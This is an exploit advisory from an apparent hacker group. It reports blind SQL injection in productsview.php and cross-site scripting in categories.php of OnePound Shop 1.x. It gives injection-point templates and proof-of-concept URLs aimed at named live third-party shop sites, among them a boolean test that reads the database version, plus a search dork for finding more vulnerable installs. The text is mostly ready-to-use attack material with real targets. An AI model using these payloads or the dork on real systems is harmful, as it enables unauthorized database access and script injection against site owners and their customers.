================================================================================================
[o] OnePound Shop 1.x Blind SQL Injection & Cross Site Scripting Vulnerability
Software : OnePound Shop version 1.x
Vendor : http://www.onepound.cn/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com
================================================================================================
[o] Vulnerable file
productsview.php
categories.php
[o] Exploit
http://localhost/[path]/productsview.php?id=xx&proid=[SQL]
http://localhost/[path]/categories.php?pid=[XSS]
[o] Proof of concept
http://www.tele-way.com/productsview.php?id=87&proid=129+and+substring(@@version,1,1)=5
http://www.tele-way.com/productsview.php?id=87&proid=129+and+substring(@@version,1,1)=4
http://www.tele-way.com/productsview.php?id=87&proid=
http://tonysbridal.net/categories.php?pid=
http://vendorhotspot.com/categories.php?pid=
[o] Dork
"Powered by OnePound"
================================================================================================
[o] Greetz
MainHack BrotherHood [ http://serverisdown.org/news ]
Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa Angela Zhang
H312Y yooogy mousekill }^-^{ kaka11 zxvf martfella
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
================================================================================================